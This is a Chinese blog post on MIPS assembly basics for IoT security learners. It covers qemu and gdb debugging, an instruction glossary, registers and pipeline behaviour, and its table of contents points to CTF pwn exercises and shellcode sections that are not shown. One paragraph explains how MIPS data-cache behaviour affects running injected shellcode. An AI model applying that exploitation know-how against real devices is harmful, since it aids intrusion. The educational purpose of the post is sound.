<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-bounce.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"zikh26.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.17.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"default"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":"ture","trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="写在前面说下学习 MIPS 汇编基础的思路，作为一个接触新知识面的小白，我首先去查了一下如何编译 MIPS 架构的程序，然后自己写了一个简单的代码，放入 IDA 后开始进行汇编代码的学习，遇见一条指令就学习一条指令，为了观察更细致的内存变化同时还要学习如何用 gdb 来进行 MIPS 架构程序的调试。在这个过程中记录见到的汇编指令和寄存器等等，接着是函数调用约定的学习，参考着网上的文章再结合 gd">
<meta property="og:type" content="article">
<meta property="og:title" content="IOT安全入门学习--MIPS汇编基础">
<meta property="og:url" content="https://zikh26.github.io/posts/919c29c4.html">
<meta property="og:site_name" content="ZIKH26&#39;s Blog">
<meta property="og:description" content="写在前面说下学习 MIPS 汇编基础的思路，作为一个接触新知识面的小白，我首先去查了一下如何编译 MIPS 架构的程序，然后自己写了一个简单的代码，放入 IDA 后开始进行汇编代码的学习，遇见一条指令就学习一条指令，为了观察更细致的内存变化同时还要学习如何用 gdb 来进行 MIPS 架构程序的调试。在这个过程中记录见到的汇编指令和寄存器等等，接着是函数调用约定的学习，参考着网上的文章再结合 gd">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112120319.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305111218207.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305102022075.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305110732606.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305092258483.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305092257102.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112102666.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112045280.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112049318.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112028607.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112030731.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112143512.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112146239.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112147526.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305120729296.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305120725360.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122036129.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122116335.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122119885.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122118517.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122127368.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305122131912.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142040351.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142045142.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305131404932.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142032761.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142034440.png">
<meta property="og:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305142127071.png">
<meta property="article:published_time" content="2023-05-15T07:51:54.338Z">
<meta property="article:modified_time" content="2023-07-01T08:45:02.744Z">
<meta property="article:author" content="ZIKH26">
<meta property="article:tag" content="MIPS架构">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112120319.png">


<link rel="canonical" href="https://zikh26.github.io/posts/919c29c4.html">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://zikh26.github.io/posts/919c29c4.html","path":"posts/919c29c4.html","title":"IOT安全入门学习--MIPS汇编基础"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>IOT安全入门学习--MIPS汇编基础 | ZIKH26's Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">ZIKH26's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-友链"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%99%E5%9C%A8%E5%89%8D%E9%9D%A2"><span class="nav-number">1.</span> <span class="nav-text">写在前面</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%90%AF%E5%8A%A8%E4%B8%8E%E8%B0%83%E8%AF%95"><span class="nav-number">2.</span> <span class="nav-text">启动与调试</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%AF%E5%8A%A8"><span class="nav-number">2.1.</span> <span class="nav-text">启动</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%B0%83%E8%AF%95"><span class="nav-number">2.2.</span> <span class="nav-text">调试</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%9B%B4%E6%8E%A5%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F"><span class="nav-number">2.2.1.</span> <span class="nav-text">直接调试程序</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8A%A0%E8%BD%BD%E8%BF%9B%E7%A8%8B%E8%B0%83%E8%AF%95"><span class="nav-number">2.2.2.</span> <span class="nav-text">加载进程调试</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B1%87%E7%BC%96%E6%8C%87%E4%BB%A4"><span class="nav-number">3.</span> <span class="nav-text">汇编指令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AF%84%E5%AD%98%E5%99%A8"><span class="nav-number">4.</span> <span class="nav-text">寄存器</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%9A%E7%94%A8%E5%AF%84%E5%AD%98%E5%99%A8"><span class="nav-number">4.1.</span> <span class="nav-text">通用寄存器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%89%B9%E6%AE%8A%E5%AF%84%E5%AD%98%E5%99%A8"><span class="nav-number">4.2.</span> <span class="nav-text">特殊寄存器</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MIPS32-%E6%9E%B6%E6%9E%84%E7%9F%A5%E8%AF%86"><span class="nav-number">5.</span> <span class="nav-text">MIPS32 架构知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E7%BA%A6%E5%AE%9A"><span class="nav-number">6.</span> <span class="nav-text">函数调用约定</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E7%BB%83%E4%B9%A0"><span class="nav-number">7.</span> <span class="nav-text">题目练习</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#axb-2019-mips"><span class="nav-number">7.1.</span> <span class="nav-text">axb_2019_mips</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%9D%E6%8A%A4%E7%AD%96%E7%95%A5"><span class="nav-number">7.1.1.</span> <span class="nav-text">保护策略</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%A7%A3%E5%86%B3%E6%8A%A5%E9%94%99"><span class="nav-number">7.1.2.</span> <span class="nav-text">解决报错</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">7.1.3.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="nav-number">7.1.4.</span> <span class="nav-text">利用思路</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#EXP"><span class="nav-number">7.1.5.</span> <span class="nav-text">EXP</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ycb-2020-mipspwn"><span class="nav-number">7.2.</span> <span class="nav-text">ycb_2020_mipspwn</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%9D%E6%8A%A4%E7%AD%96%E7%95%A5-1"><span class="nav-number">7.2.1.</span> <span class="nav-text">保护策略</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF-1"><span class="nav-number">7.2.2.</span> <span class="nav-text">利用思路</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#EXP-1"><span class="nav-number">7.2.3.</span> <span class="nav-text">EXP</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#shellcode%E7%BC%96%E5%86%99"><span class="nav-number">8.</span> <span class="nav-text">shellcode编写</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#write-%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8"><span class="nav-number">8.1.</span> <span class="nav-text">write 系统调用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#execve-%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8"><span class="nav-number">8.2.</span> <span class="nav-text">execve 系统调用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#shellcode%E7%9A%84%E6%8F%90%E5%8F%96%E4%B8%8E%E6%B5%8B%E8%AF%95"><span class="nav-number">8.3.</span> <span class="nav-text">shellcode的提取与测试</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="nav-number">9.</span> <span class="nav-text">参考文章</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ZIKH26"
      src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202307011626843.jpg">
  <p class="site-author-name" itemprop="name">ZIKH26</p>
  <div class="site-description" itemprop="description">万古凡间一过客，九天之上第一仙</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">107</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">111</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zikh26.github.io/posts/919c29c4.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202307011626843.jpg">
      <meta itemprop="name" content="ZIKH26">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ZIKH26's Blog">
      <meta itemprop="description" content="万古凡间一过客，九天之上第一仙">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="IOT安全入门学习--MIPS汇编基础 | ZIKH26's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          IOT安全入门学习--MIPS汇编基础
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-05-15 15:51:54" itemprop="dateCreated datePublished" datetime="2023-05-15T15:51:54+08:00">2023-05-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-07-01 16:45:02" itemprop="dateModified" datetime="2023-07-01T16:45:02+08:00">2023-07-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/IOT%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">IOT安全</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h3 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h3><p>说下学习 <code>MIPS</code> 汇编基础的思路，作为一个接触新知识面的小白，我首先去查了一下如何编译 <code>MIPS</code> 架构的程序，然后自己写了一个简单的代码，放入 <code>IDA</code> 后开始进行汇编代码的学习，遇见一条指令就学习一条指令，为了观察更细致的内存变化同时还要学习如何用 <code>gdb</code> 来进行 <code>MIPS</code> 架构程序的调试。在这个过程中记录见到的汇编指令和寄存器等等，接着是函数调用约定的学习，参考着网上的文章再结合 <code>gdb</code> 调试基本就能理解透彻。感觉对 <code>MIPS</code> 汇编基础和函数调用约定已经得心应手，就可以做一些 <code>PWN</code> 题以此来稳固打下的基础，最后尝试来手写各种的 <code>shellcode</code>。希望这个思路能给之后自学者一点借鉴。</p>
<span id="more"></span>

<p>下面先让我们编译运行自己的第一个 <code>MIPS</code> 架构的程序</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">//mips-linux-gnu-gcc demo.c -o demo -static -g</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">sum</span><span class="params">(<span class="type">int</span> a,<span class="type">int</span> b)</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">int</span> value=a+b;</span><br><span class="line">	<span class="keyword">return</span> value;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="type">int</span> c=sum(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;value ==&gt; %d\n&quot;</span>,c);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="启动与调试"><a href="#启动与调试" class="headerlink" title="启动与调试"></a>启动与调试</h3><h4 id="启动"><a href="#启动" class="headerlink" title="启动"></a>启动</h4><p>如果是小端序的程序使用 <code>qemu-mipsel ./xxx</code> 运行程序，如果是大端序的程序用 <code>qemu-mips ./xxx</code> 运行程序 </p>
<p>补充：</p>
<ol>
<li>如果运行动态链接的程序，可能会遇见一些报错， 这里的 <a href="#%E8%A7%A3%E5%86%B3%E6%8A%A5%E9%94%99">解决方法</a> 或许会对你有所帮助</li>
<li>使用 <code>readelf -h xxx</code> 可以查看程序的字节序</li>
</ol>
<h4 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h4><p>调试分为 <strong>直接调试程序</strong>  和 <strong>加载进程调试</strong></p>
<h5 id="直接调试程序"><a href="#直接调试程序" class="headerlink" title="直接调试程序"></a>直接调试程序</h5><p>假设要调试的程序叫做 <code>demo</code> （大端序），那么在终端执行 <code>qemu-mips -g 1234 ./demo</code></p>
<p>然后再开一个终端执行下面的命令（<code>set endian big</code> 这里是设置为大端序，如果是小端序的话设置为 <code>little</code> ，如果想加载程序符号表的话，再添加一个 <code>symbol-file ./demo</code>） </p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">gdb-multiarch</span><br><span class="line">set architecture mips</span><br><span class="line">set endian big</span><br><span class="line">target remote localhost:1234</span><br></pre></td></tr></table></figure>

<p>实际调试情况如下图，如此就可以进入到 <code>gdb</code> 的调试界面了</p>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305112120319.png" alt="image-20230511212044987"></p>
<p>如果感觉每次都要敲这几条命令有点麻烦的话，可以编写一个 <code>shell</code> 脚本来简化工作，比如我们创建一个叫做 <code>loader.sh</code> 脚本，编写内容如下（纯属举例，具体情况具体处理）</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">set architecture mips</span><br><span class="line">set endian little</span><br><span class="line">symbol-file ./pwn2</span><br><span class="line">target remote localhost:1234</span><br></pre></td></tr></table></figure>

<p>然后我们只需要执行 <code>gdb-multiarch</code> 后，执行一次 <code>source loader.sh </code> 命令即可。</p>
<h5 id="加载进程调试"><a href="#加载进程调试" class="headerlink" title="加载进程调试"></a>加载进程调试</h5><p>这个通常用于我们编写攻击脚本后，需要进行调试判断数据是否是预期的那样。</p>
<p>只需要在 <code>EXP</code> 中编写代码 <code>p=process([&quot;qemu-mipsel&quot;, &quot;-g&quot;, &quot;1234&quot;,&quot;./demo&quot;])</code> 即可，这其实传入进去的就是一个命令包括参数列表。正常运行程序也是同理 <code>p=process([&quot;qemu-mips&quot;,&quot;./demo&quot;])</code></p>
<p>剩下的依旧是新开一个终端执行 <code>gdb-multiarch</code> 命令等等（同上）</p>
<h3 id="汇编指令"><a href="#汇编指令" class="headerlink" title="汇编指令"></a>汇编指令</h3><p><code>li</code> (Load Immediate)指令用于将一个立即数存入一个通用寄存器,	<code>li   $gp, 0x498300</code> 将 <code>$gp</code> 寄存器的值赋值为 <code>0x498300</code></p>
<p><code>lui</code> 指令将一个 <code>16</code> 位的立即数左移 <code>16</code> 位后存入目标寄存器中， <code>lui   $v0, 0x46</code> 是将 <code>0x46</code> 立即数左移  <code>16</code> 位后存入 <code>$v0</code> 寄存器，即 <code>$v0</code> 寄存器的值为 <code>0x460000</code></p>
<p><code>ori</code> 指令是 <code>MIPS</code> 汇编中的一种逻辑运算指令，它可以将一个寄存器的低 16 位与一个 16 位的立即数按位或运算，并将结果存入另一个寄存器中。<code>ori $t6,$t6,0x430a</code> 指令将 <code>t6</code> 寄存器与 <code>0x430a</code> 立即数进行或运算，将结果放回 <code>$t6</code></p>
<p><code>la</code> (Load Address) 指令用于将一个地址或标签存入一个寄存器，<code>la $v0, puts</code> 指令将 <code>puts</code> 函数地址存入 <code>$v0</code> 寄存器中</p>
<p><code>lw</code> (Load Word) 指令用于<strong>从一个指定的地址加载一个 <code>word</code> 类型的值</strong>到一个寄存器     <code>lw $v0, 0x14($fp)</code> 将 <code>$fp+0x14</code> 的位置中的数据存入到 <code>v0</code> 中</p>
<p><code>sw</code> (Store Word) 将源寄存器中的值存入指定地址，<code>sw   $ra, 0x24($sp) </code> 将 <code>$ra</code> 的值写入距离栈顶（<code>$sp</code>）偏移 <code>0x24</code> 的内存单元中</p>
<p><code>move</code> 指令用于寄存器之间值的传递，<code>move   $t5,$t1</code> 将 <code>$t1</code> 赋值给 <code>$5</code> </p>
<p><code>addi</code> 指令用于计算一个寄存器加上一个立即数，<code>addi $t0,$t1,5</code> 将 <code>$t1</code> 加上 <code>5</code> 之后将结果放为 <code>$t0</code></p>
<p><code>addu</code> 指令用于计算无符号数之间进行的加法操作，<code>addu $t0,$t1,$t2</code> 将 <code>$t1</code> 和 <code>$t2</code> 进行无符号相加，结果存储在 <code>$t0</code></p>
<p><code>add</code> 指令和 <code>addu</code> 一样，只不过进行的是有符号数之间的加法。</p>
<p><code>addiu</code> 指令将上面的 <code>addi</code> 和 <code>addu</code> 结合了一下，<code> addiu  $a1, $zero, 2</code> 进行的是将寄存器<code>$zero</code> 加上一个立即无符号数 <code>2</code> ，并将结果存回寄存器 <code>$a1</code> 中</p>
<p><code>jr</code> 是跳转指令，<code>jar $ra</code> 跳转到 <code>$ra</code> 寄存器指向的地址处</p>
<p><code>jal</code> 指令是跳转指令，<code>jal target</code> 复制当前的 <code>PC</code> 值到 <code>$ra</code> 寄存器，然后跳转到 <code>target</code> 处</p>
<p><code>bnez</code> 指令用于在寄存器的值不为零时进行分支跳转，<code>bnez   $v0, loc_4005E8</code> 表示当 <code>$v0</code> 不为零时跳转到 <code>0x4005E8</code> </p>
<p><code>b</code> 是无条件跳转指令，<code>b loc_400604</code>  直接跳转到 <code>0x400604</code> 地址处</p>
<h3 id="寄存器"><a href="#寄存器" class="headerlink" title="寄存器"></a>寄存器</h3><h4 id="通用寄存器"><a href="#通用寄存器" class="headerlink" title="通用寄存器"></a>通用寄存器</h4><p>在 <code>MIPS</code> 体系结构中有 <code>32</code> 个通用寄存器，在汇编程序中可以用编号 <code>$0-$31</code>表示，也可以用寄存器的名字表示</p>
<img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305111218207.png" alt="image-20230511121821077" style="zoom:50%;" />



<h4 id="特殊寄存器"><a href="#特殊寄存器" class="headerlink" title="特殊寄存器"></a>特殊寄存器</h4><p><code>MIPS</code> 架构中定义了 <code>3</code> 个特殊的寄存器，分别是 <code>PC</code>（程序计数器）、<code>HI</code> (乘除结果高位寄存器)、<code>LO</code>（乘除结果低位寄存器）。在进行乘法运算时， <code>HI</code> 和 <code>LO</code> 保存乘法的运算结果，其中 <code>HI</code> 存储高 <code>32</code> 位，<code>LO</code> 存储低 <code>32</code> 位；在进行除法运算时， <code>HI</code> 保存余数， <code>LO</code> 存储商。</p>
<h3 id="MIPS32-架构知识"><a href="#MIPS32-架构知识" class="headerlink" title="MIPS32 架构知识"></a><code>MIPS32</code> 架构知识</h3><ul>
<li><p><code>MIPS</code> 固定 <code>4</code> 字节指令长度 </p>
</li>
<li><p>栈是从内存的高地址向低地址方向增长的</p>
</li>
<li><p>叶子函数：函数内部没有再调用其他函数</p>
</li>
<li><p>非叶子函数：函数内部调用其他函数的函数</p>
</li>
<li><p>流水线效应：在分析 <code>MIPS</code> 汇编代码时会发现，其跳转到函数或者分支跳转语句的下一条都是 <code>nop</code> （如下图），这是因为 <code>MIPS</code> 采用了高度的流水线，其中最重要的是跳转指令导致的<strong>分支延迟效应</strong>。在分支跳转语句后面那条语句叫做<strong>分支延迟槽</strong>，当跳转语句刚执行的一瞬间，跳转到的地址刚填充好（填充到程序计数器），<strong>还没有执行程序计数器中存放的指令，分支延迟槽的指令已经被执行了，这就是流水线效应</strong>（几条指令被同时执行，只是处于不同的阶段， <strong><code>MIPS</code> 不像其他架构那样存在流水线阻塞</strong>），为了避免出现问题，因此在分支跳转语句的下一条指令通常是 <code>nop</code> 指令或者其他有用的指令。</p>
</li>
<li><p>缓存刷新机制：<code>MIPS CPUs</code>有两个独立的 <code>cache</code> : <code>指令cache</code> 和 <code>数据cache</code> 。 指令和数据分别在两个不同的缓存中。当缓存满了，会触发 <code>flush</code> , 将数据写回到主内存。攻击者的攻击<code>payload</code> 通常会被应用当做数据来处理，存储在数据缓存中。当 <code>payload</code> 触发漏洞， 劫持程序执行流程的时候，会去执行内存中的 <code>shellcode</code> .如果数据缓存没有触发 <code>flush</code> 的话，<code>shellcode</code> 依然存储在缓存中，而没有写入主内存。这会导致程序执行了本该存储 <code>shellcode</code> 的地址处随机的代码，导致不可预知的后果。(通常执行 <code>sleep(1)</code> 刷新)</p>
</li>
</ul>
<p><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305102022075.png" alt="image-20230510202231987"></p>
<h3 id="函数调用约定"><a href="#函数调用约定" class="headerlink" title="函数调用约定"></a>函数调用约定</h3><img src="https://blog-1311372141.cos.ap-nanjing.myqcloud.com/images/202305110732606.png" alt="image-20230511073238845" style="zoom:50%;" />



